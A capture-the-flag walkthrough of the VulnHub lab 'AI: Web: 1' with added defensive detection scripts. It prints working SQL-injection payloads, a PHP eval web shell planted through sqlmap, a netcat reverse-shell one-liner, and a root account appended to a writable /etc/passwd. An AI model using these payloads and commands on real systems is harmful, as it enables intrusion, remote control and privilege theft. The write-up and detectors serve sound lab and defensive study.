Target machine download (official site): AI: Web: 1 ~ VulnHub
Target description
Difficulty: Intermediate
Network: DHCP (Automatically assign)
Network Mode: NAT
This box is designed to test skills of penetration tester. The goal is simple. Get flag from /root/flag.txt. Enumerate the box, get low privileged shell and then escalate privilege to root. For any hint please tweet on @arif_xpress
Target machine console
Information gathering
Host discovery
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sP 10.4.7.0/24 -oN nmap.sP
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-12 11:51 CST
Nmap scan report for 10.4.7.2
Host is up (0.00024s latency).
MAC Address: 00:50:56:E0:20:34 (VMware)
Nmap scan report for 10.4.7.179
Host is up (0.00064s latency).
MAC Address: 00:0C:29:42:F7:5E (VMware)
Nmap scan report for 10.4.7.254
Host is up (0.0015s latency).
MAC Address: 00:50:56:E4:E4:95 (VMware)
Nmap scan report for 10.4.7.139
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 1.98 seconds
Port scan
┌──(kali㉿kali)-[~]
└─$ sudo nmap -A -T4 -sC -p- -sT 10.4.7.179 -oN nmap.A
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-12 11:55 CST
Nmap scan report for 10.4.7.179
Host is up (0.00052s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-title: AI Web 1.0
| http-robots.txt: 2 disallowed entries
|_/m3diNf0/ /se3reTdir777/uploads/
|_http-server-header: Apache
MAC Address: 00:0C:29:42:F7:5E (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

TRACEROUTE
HOP RTT ADDRESS
1 0.52 ms 10.4.7.179

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.68 seconds
Website information
Website homepage
Nikto report
┌──(kali㉿kali)-[~]
└─$ nikto -h http://10.4.7.179/
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.4.7.179
+ Target Hostname: 10.4.7.179
+ Target Port: 80
+ Start Time: 2025-02-12 12:35:32 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ /robots.txt: contains 2 entries which should be manually viewed. See: https://developer.mozilla.org/en-US/docs/Glossary/Robots.txt
+ /: Server may leak inodes via ETags, header found with file /, inode: 8d, size: 590703a18e440, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
+ OPTIONS: Allowed HTTP Methods: GET, POST, OPTIONS, HEAD .
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8104 requests: 0 error(s) and 4 item(s) reported on remote host
+ End Time: 2025-02-12 12:39:25 (GMT8) (233 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
robots.txt
Disallow: /m3diNf0/
Disallow: /se3reTdir777/uploads/
/se3reTdir777/ directory
Sensitive directory scanning
/m3diNf0/ directory scan
dirb scanner
┌──(kali㉿kali)-[~]
└─$ dirb http://10.4.7.179/m3diNf0/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Feb 12 12:47:36 2025
URL_BASE: http://10.4.7.179/m3diNf0/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.4.7.179/m3diNf0/ ----
+ http://10.4.7.179/m3diNf0/info.php (CODE:200|SIZE:84260)
-----------------
END_TIME: Wed Feb 12 12:47:40 2025
DOWNLOADED: 4612 - FOUND: 1
dirsearch scanner
Found /info.php
Extracting sensitive information
User/Group www-data(33)/33
DOCUMENT_ROOT /home/www/html/web1x443290o2sdf92213
se3reTdir777 directory scan
┌──(kali㉿kali)-[~]
└─$ dirb http://10.4.7.179/se3reTdir777/

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Wed Feb 12 16:17:39 2025
URL_BASE: http://10.4.7.179/se3reTdir777/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.4.7.179/se3reTdir777/ ----
+ http://10.4.7.179/se3reTdir777/index.php (CODE:200|SIZE:1228)
==> DIRECTORY: http://10.4.7.179/se3reTdir777/uploads/
---- Entering directory: http://10.4.7.179/se3reTdir777/uploads/ ----
-----------------
END_TIME: Wed Feb 12 16:17:46 2025
DOWNLOADED: 9224 - FOUND: 1
Finding the entry point
Locate the submitted parameter and use sqlmap to confirm the vulnerability
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit"
Injection point information
- Parameter: uid (POST)
- Total requests: 3940 HTTP(s) requests
Analysis of the different injection types
1. Boolean-based blind
- Type description: a blind injection based on boolean conditions. It relies on a boolean expression in the SQL statement, normally in a WHERE or HAVING clause, and infers information from whether the condition evaluates true or false.
- Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
- Payload: uid=1' OR NOT 1507=1507#&Operation=Submit
- How it works: in the original SQL statement, 1' closes the single quote that may surround the value; OR NOT 1507=1507 is a boolean expression with a fixed truth value; # is the MySQL comment symbol, which comments out the rest of the original statement so that no syntax error occurs. By observing differences in the page response (status, content length and so on) one determines whether the condition held and extracts database information step by step.

2. Error-based
- Type description: uses the error message the database returns when it executes a malformed SQL statement to extract database information; typically used in WHERE, HAVING, ORDER BY or GROUP BY clauses.
- Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
- Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit
- How it works: 1' closes the single quote; AND joins the following condition; GTID_SUBSET is a function available in MySQL 5.6 and later; CONCAT concatenates strings; ELT returns a value according to the condition. When the statement executes, if the database version supports the function and the statement errors out, the error message contains the string we constructed, which leaks database information. -- IvZq is the comment part and comments out the rest of the original statement.

3. Time-based blind
- Type description: a blind injection based on time delay. It makes the database execute the SLEEP function to decide whether a condition is true: if it is, the database pauses for a period, and information is inferred from the change in page response time.
- Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
- Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit
- How it works: 1' closes the single quote; AND joins the condition; SELECT(SLEEP(5)) makes the database pause for 5 seconds. If the page response time increases noticeably the condition is true, otherwise it is false. By trying different conditions repeatedly, database information is extracted step by step. -- vIYW is the comment part.

4. UNION query
- Type description: uses the SQL UNION operator to merge the result of the original query with the result of a query we construct, returning database information through the page.
- Title: MySQL UNION query (NULL) - 3 columns
- Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
- How it works: 1' closes the single quote; UNION ALL merges the query results; SELECT NULL,NULL,CONCAT(...) is our constructed query, whose column count must match the original query (3 columns here). CONCAT concatenates strings, and by changing what is concatenated different database information can be retrieved. # is the comment symbol and comments out the rest of the original statement.
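From the defensive side, the four payload shapes listed above are easy to recognise in request data. The following Python script is an added example (not part of the original writeup and not sqlmap's code): it classifies form-encoded POST bodies by the technique each payload uses; the four malicious bodies are the ones sqlmap reported against uid on this box, while the benign body and the "one body per line" log format are constructed.

```python
"""Classify SQL-injection probes in POST bodies.
Added example, not part of the original writeup: the four payload bodies are
the ones sqlmap reported against uid on this box; the benign body and the
'one form body per line' log format are constructed for the example."""
import re
from urllib.parse import parse_qs

# One signature per technique, keyed by the name sqlmap uses for it.
SIGNATURES = {
    "boolean-based blind": re.compile(r"'\s*(?:OR|AND)\s+(?:NOT\s+)?\d+\s*=\s*\d+", re.I),
    "error-based": re.compile(r"\b(?:GTID_SUBSET|EXTRACTVALUE|UPDATEXML)\s*\(", re.I),
    "time-based blind": re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I),
    "UNION query": re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I),
}
# MySQL comment terminators sqlmap appends to swallow the rest of the query.
COMMENT_TAIL = re.compile(r"(?:#|--\s+\w*)\s*$")

def classify(value: str) -> list[str]:
    """Technique names whose signature matches one decoded parameter value."""
    hits = [name for name, rx in SIGNATURES.items() if rx.search(value)]
    if hits and COMMENT_TAIL.search(value):
        hits.append("comment-terminated")
    return hits

def scan_body(body: str) -> dict[str, list[str]]:
    """Map each suspicious parameter of a form-encoded body to its techniques."""
    findings = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for v in values:
            hits = classify(v)
            if hits:
                findings[name] = hits
    return findings

# Constructed log: the raw form body of each POST to /se3reTdir777/, one per line.
SAMPLE_BODIES = [
    "uid=1&Operation=Submit",
    "uid=1' OR NOT 1507=1507#&Operation=Submit",
    "uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit",
    "uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit",
    "uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit",
]

if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        print(scan_body(body) or "clean", "<-", body[:70])
```

Note that a default Apache access log does not record POST bodies, so this has to run on application, WAF or mod_security logs that do.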
Exploiting the SQLi vulnerability
Database
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --current-db
┌──(kali㉿kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --current-db
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.2#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:54:10 /2025-02-12/
[17:54:10] [INFO] resuming back-end DBMS 'mysql'
[17:54:10] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:54:10] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:54:10] [INFO] fetching current database
current database: 'aiweb1'
[17:54:10] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[17:54:10] [WARNING] your sqlmap version is outdated

[*] ending @ 17:54:10 /2025-02-12/
Obtained the database name: aiweb1
Tables
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --tables
┌──(kali㉿kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --tables
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.2#stable}
|_ -| . [)]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:57:21 /2025-02-12/
[17:57:21] [INFO] resuming back-end DBMS 'mysql'
[17:57:21] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:57:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:57:21] [INFO] fetching tables for database: 'aiweb1'
Database: aiweb1
[2 tables]
+------------+
| user       |
| systemUser |
+------------+

[17:57:21] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[17:57:21] [WARNING] your sqlmap version is outdated

[*] ending @ 17:57:21 /2025-02-12/
Columns and data
sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --dump
┌──(kali㉿kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" -D "aiweb1" --dump
        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.7.2#stable}
|_ -| . ["]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 17:59:20 /2025-02-12/
[17:59:20] [INFO] resuming back-end DBMS 'mysql'
[17:59:20] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[17:59:21] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[17:59:21] [INFO] fetching tables for database: 'aiweb1'
[17:59:21] [INFO] fetching columns for table 'user' in database 'aiweb1'
[17:59:21] [INFO] fetching entries for table 'user' in database 'aiweb1'
Database: aiweb1
Table: user
[3 entries]
+----+----------+-----------+
| id | lastName | firstName |
+----+----------+-----------+
| 1  | admin    | admin     |
| 2  | root     | root      |
| 3  | mysql    | mysql     |
+----+----------+-----------+
Data obtained: these are the account names and passwords
Writing a web shell with sqlmap
Writing the web shell
┌──(kali㉿kali)-[~]
└─$ vim yjh.php
┌──(kali㉿kali)-[~]
└─$ cat yjh.php
<?php
@eval($_REQUEST[777]);
?>
Combined with the DOCUMENT_ROOT found above, /home/www/html/web1x443290o2sdf92213, the destination path for the file write is:
sqlmap -u "http://10.4.7.179/se3reTdir777/" --data "uid=1&Operation=Submit" --file-write ./yjh.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php
┌──(kali㉿kali)-[~]
└─$ sudo sqlmap -u http://10.4.7.179/se3reTdir777/ -data "uid=1&Operation=Submit" --file-write ./yjh.php --file-dest /home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php
[sudo] password for kali:
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.7.2#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 09:31:34 /2025-02-13/
[09:31:34] [INFO] resuming back-end DBMS 'mysql'
[09:31:34] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: uid (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: uid=1' OR NOT 1507=1507#&Operation=Submit

    Type: error-based
    Title: MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)
    Payload: uid=1' AND GTID_SUBSET(CONCAT(0x71626b7171,(SELECT (ELT(6293=6293,1))),0x7176766a71),6293)-- IvZq&Operation=Submit

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: uid=1' AND (SELECT 2955 FROM (SELECT(SLEEP(5)))xmho)-- vIYW&Operation=Submit

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: uid=1' UNION ALL SELECT NULL,NULL,CONCAT(0x71626b7171,0x4d4b6756554276745a59427a6659506e676c564767696245466d67745a7669595075564c73516642,0x7176766a71)#&Operation=Submit
---
[09:31:34] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.6
[09:31:34] [INFO] fingerprinting the back-end DBMS operating system
[09:31:34] [INFO] the back-end DBMS operating system is Linux
[09:31:34] [WARNING] expect junk characters inside the file as a leftover from UNION query
do you want confirmation that the local file 'yjh.php' has been successfully written on the back-end DBMS file system ('/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php')? [Y/n] y
[09:31:44] [INFO] the remote file '/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads/shell.php' is larger (35 B) than the local file 'yjh.php' (33B)
[09:31:44] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/10.4.7.179'
[09:31:44] [WARNING] your sqlmap version is outdated

[*] ending @ 09:31:44 /2025-02-13/
Connecting with AntSword (中国蚁剑)
Password: 777
Browse the directory and obtain a shell
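For the defender, the root cause here is an uploads directory that the database account can write into and that PHP will execute from. The Python script below is an added example (not part of the writeup) that scans an uploads tree for one-line PHP shells of the yjh.php shape; the files it inspects are constructed in a temporary directory, so it runs offline.

```python
"""Scan an uploads directory for one-line PHP web shells like the yjh.php above.
Added example, not part of the writeup; the files are constructed in a
temporary directory so the scan runs offline."""
import os
import re
import tempfile

# A code-execution sink fed straight from a request superglobal, with or
# without the '@' error suppression and a base64_decode() wrapper.
SHELL_RX = re.compile(
    r"@?\s*\b(?:eval|assert|system|passthru|shell_exec)\s*\(\s*"
    r"(?:base64_decode\s*\(\s*)?\$_(?:REQUEST|GET|POST|COOKIE)\b", re.I)

def is_webshell(source: str) -> bool:
    return bool(SHELL_RX.search(source))

def scan_uploads(root: str) -> list[str]:
    """Relative paths under root that PHP would execute and that match SHELL_RX.
    Junk bytes around the payload (sqlmap warned about them) do not matter."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if not fn.lower().endswith((".php", ".phtml", ".php5")):
                continue
            path = os.path.join(dirpath, fn)
            with open(path, encoding="utf-8", errors="ignore") as fh:
                if is_webshell(fh.read()):
                    hits.append(os.path.relpath(path, root))
    return sorted(hits)

def demo() -> list[str]:
    """Write a constructed uploads tree and scan it."""
    samples = {
        "shell.php": "\x00\x00<?php\n@eval($_REQUEST[777]);\n?>",  # yjh.php body plus junk
        "avatar.php": "<?php echo htmlspecialchars($_GET['n']); ?>",
        "notes.txt": "eval($_REQUEST[777]) in a text file is not executed",
    }
    with tempfile.TemporaryDirectory() as d:
        for name, body in samples.items():
            with open(os.path.join(d, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return scan_uploads(d)

if __name__ == "__main__":
    print("web shells found:", demo())
```

Disabling PHP execution under uploads (or not serving it at all) removes the condition the scan looks for; the scan is a detective control, not a substitute for that.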
Reverse shell
Local listener
┌──(kali㉿kali)-[~/Documents/AI_WEB_1]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
Run on the server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.9 1234 >/tmp/f
Getting an interactive shell
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/home/www/html/web1x443290o2sdf92213/se3reTdir777/uploads$
Check the current identity and privileges
Privilege escalation
Search the whole filesystem for writable directories and files
find / -writable -type d 2>/dev/null # directories
find / -writable -type f 2>/dev/null # files
We find that /etc/passwd is writable by an ordinary user
ls -la /etc/passwd
Escalating privileges via /etc/passwd
www-data@aiweb1:/etc$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
....
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh
Analysing root:x:0:0:root:/root:/bin/bash
root is the username; x is the password hash field; the first 0 is the user ID and the second 0 is the group ID; /root is the user's home directory; /bin/bash is the shell the user runs commands with
Generate a password hash for the new user
Write a user into /etc/passwd
echo ajest:ajrFVgiA9Y9gw:0:0:root:/root:/bin/bash >> /etc/passwd
su ajest # switch user
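The same tampering is simple to audit for on a host. The Python script below is an added example, not from the writeup: it parses /etc/passwd content and flags extra UID-0 accounts, empty password fields and hashes stored directly in the file instead of /etc/shadow, and checks the file mode that made this escalation possible. SAMPLE_PASSWD is constructed around the root, aiweb1pwn and injected ajest entries shown above; the www-data line is invented filler.

```python
"""Audit /etc/passwd for the tampering shown above.
Added example, not from the writeup. SAMPLE_PASSWD is constructed: it mirrors
the box's root and aiweb1pwn lines plus the injected ajest line; the www-data
line is invented filler."""
import os
import stat

SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
aiweb1pwn:x:1001:1001::/home/aiweb1pwn:/bin/sh
ajest:ajrFVgiA9Y9gw:0:0:root:/root:/bin/bash
"""

def audit_passwd(text: str) -> list[str]:
    """One finding per suspicious line: malformed rows, extra UID-0 accounts,
    empty password fields, and hashes kept in field 2 instead of /etc/shadow."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append(f"line {lineno}: malformed entry ({len(fields)} fields)")
            continue
        name, pw, uid = fields[0], fields[1], fields[2]
        if uid == "0" and name != "root":
            findings.append(f"line {lineno}: non-root account '{name}' has UID 0")
        if pw == "":
            findings.append(f"line {lineno}: '{name}' has an empty password field")
        elif pw not in ("x", "*", "!", "!!"):
            findings.append(f"line {lineno}: password hash stored in passwd for '{name}'")
    return findings

def passwd_mode_ok(path: str = "/etc/passwd") -> bool:
    """True when the file is root-owned and not writable by group or others
    (the box failed this check); False if the path does not exist."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return False
    return st.st_uid == 0 and not st.st_mode & (stat.S_IWGRP | stat.S_IWOTH)

if __name__ == "__main__":
    for f in audit_passwd(SAMPLE_PASSWD):
        print("[!]", f)
    print("/etc/passwd mode ok:", passwd_mode_ok())
```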
Getting the flag
┌──(kali㉿kali)-[/dev]
└─$ nc -lnvp 1234
listening on [any] 1234 ...
connect to [10.4.7.139] from (UNKNOWN) [10.4.7.179] 41696
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@aiweb1:/$ su ajest
su ajest
Password: 123456
root@aiweb1:/# cat /root/flag.txt
cat /root/flag.txt
####################################################
# #
# AI: WEB 1.0 #
# #
# Congratulation!!! #
# #
# Thank you for penetrate my system. #
# #
# Hope you enjoyed this. #
# #
# #
# flag{cbe5831d864cbc2a104e2c2b9dfb50e5acbdee71} #
# #
####################################################
root@aiweb1:/# ^C